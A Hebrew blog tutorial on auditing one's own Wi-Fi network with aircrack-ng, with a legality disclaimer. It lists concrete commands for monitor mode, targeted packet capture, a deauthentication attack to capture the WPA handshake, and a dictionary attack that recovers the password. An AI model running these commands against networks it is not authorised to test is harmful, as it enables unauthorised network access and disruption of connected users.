כיצד לבחון את רשת האינטרנט שברשותך?

לצורך הבדיקה נוריד ונתקין את סט הכלים של aircrack-ng.
כולל בתוכו:
* airmon-ng
* airodump-ng
* aireplay-ng
* aircrack-ng


הבדיקה נעשתה באמצעות ראוטר שנמצא בבעלותי, חשוב להבהיר שתקיפת רשתות אלחוטיות שלא בבעלותך מהווה עבירה על החוק. אחזור ואדגיש כי החומר המוצג באתר הינו לצורכי הוראה, לימוד ומחקר בלבד! כל שימוש אחר במידע הינו באחריות המשתמש!


Aircrack-ng:
חבילה של כלים לבדיקות אבטחה של רשתות אלחוטיות.
הכלים בחבילה משמשים לבדיקות שונות:
Airmon-ng (מצב מוניטור): לוכד ומייצא את נתוני הקבצים לעיבוד בכלי נוסף.
Airodump-ng (בדיקת הזרקה): בדיקת המתאם האלחוטי, בדיקת איכות ובחירת ערוץ.
Aireplay-ng (מצב תקיפה): ביטול אימות, נקודות גישה מזויפות ועוד...
Aircrack-ng (פיצוח): פיצוח סיסמאות של פרוטוקולי האבטחה WPA-PSK, WPA, WPA2, WEP.

ניתן להשתמש בכלים אלו דרך ממשק הפקודה והם זמינים להורדה למערכת הפעלה שונות כגון:
Windows, מערכות יוניקס (OpenBSD, NetBSD, Solaris, FreeBSD) ומערכות הפעלה מבית Apple.

לצורך בדיקת הרשת יש להשתמש בכרטיס רשת מותאם:
כפי שניתן לראות בתוצאות הסקר, כרטיסי TP-LINK וכרטיסי ALFA נחשבים למומלצים ביותר.
אני השתמשתי בכרטיס שעולה 88 שקלים (עשה את העבודה):
לינק למוצר באתר eBay



Airmon-ng (מצב מוניטור)

בעזרת הפקודה הבאה העביר את כרטיס הרשת למצב ניטור.
airmon-ng start wlan0

לאחר הזנת הפקודה המערכת תיצור כרטיס רשת חדש בשם mon0 (בהתאם לקונפיגורציה) ועימו תבצע את פעולות הפענוח של הסיסמאות.

הפקודה הבאה תכבה את מצב הניטור:
airmon-ng stop mon0

* הזנת פקודת airmon-ng ללא פרמטרים תציג את מצב התקני הרשת במערכת.
* לעיתים ישנם תהליכים הרצים ברקע שעשוים לגרום לבעיות ולקשיים בסריקה.

airmon-ng check
- יציג תהליכים שעשוים לגרום לבעיות
airmon-ng check kill - הורג את התהליכים הבעייתים

Airodump-ng

כלי זה משמש ללכידת מנות וכתיבת קבצים המכילים פרטים של כל נקודות הגישה. 
לפני השימוש בכלי זה, יש להפעיל את כלי הניטור (airmon-ng)

sudo airodump-ng mon0

לאחר הרצת הפקודה תופיע רשימה של כל נקודות הגישה, ערוץ השידור, עוצמה, הצפנה ועוד. 


נבחר את שם הרשת ונבקש מהכלי שיאסוף חבילות מידע רק מה-SSID הרצוי:

airodump-ng -c <channel> --bssid <MAC> -w <File> mon0

Aireplay-ng
כלי זה יוצר תנועה לשימוש עתידי בפיצוח סיסמאות (WEP/WPA-PSK) ומזריקה תעבורה. 
כלי זה מהווה נדבך חשוב בהתקפת ביטול אימות ברשת אלחוטית. בהתקפה זו שולח התוקף מנות לניתוק כל המשתמשים המחוברים אל נקודת הגישה האלחוטית ומנצל זאת למספר מטרות:
* זיהוי מזהה רשת (ESSID) מוסתר.
* לכידת לחיצות ידיים (HandShakes) בפרוטוקול WPA/WPA2 ואילוץ המשתמש לבצע אימות מחדש.
* יצירת בקשות ARP זדוניות.
* בעת ביצוע פעולה זו מוכרח להיות משתמש שמחובר אל נקודת הגישה האלחוטית.

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> mon0

Aircrack-ng
כלי זה משחזר את המנות שנאספו בתוכנית airodump-ng ומפתח את מפתח הנתונים.
בעת פיצוח סיסמאות של WPA / WPA2 הכלי עובד בשיטת התקפת מילון ולחיצת יד מרובעת נדרשת כקלט (הפעולה מתרחשת בעת ביצוע ביטול אימות).
aircrack-ng -0 -w <Wordlist Path> file.out-01.cap

בסיום התהליך תוצג הסיסמא כטקסט גלוי.



פקודות עזר שימושיות:
iw list - מציג מידע על התקן הרשת האלחוטי
rmmod r8187 - שינוי הגדרת ההתקן
modprobe rtl8187 - הפעלת ההתקן הרצוי
iw dev wlan0 scan | grep SSID - הצגת הרשתות שנמצאו בטווח 
iwlist wlan0 frequency - מציג את התדרים של כל ערוץ של הרשתות שנמצאו בטווח
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID" - מציג את הערוצים של כל רשת
iw dev wlan0 interface add mon0 type monitor - פתיחת התקן נוסף מוניטור
iw dev mon0 interface del - מוחק את ההתקן הנוסף
tcpdump -i mon0 -s 65000 -p - מסניף את התעבורה
iwlist wlan0 scanning |grep ESSID - הצגת שם השם הרשתות
iwlist wlan0 scaning | egrep "ESSID|Channel" - מציג את הערוץ של כל רשת שנמצאה בטווח
Share To:

פאביו ליאור רחמים

Post A Comment: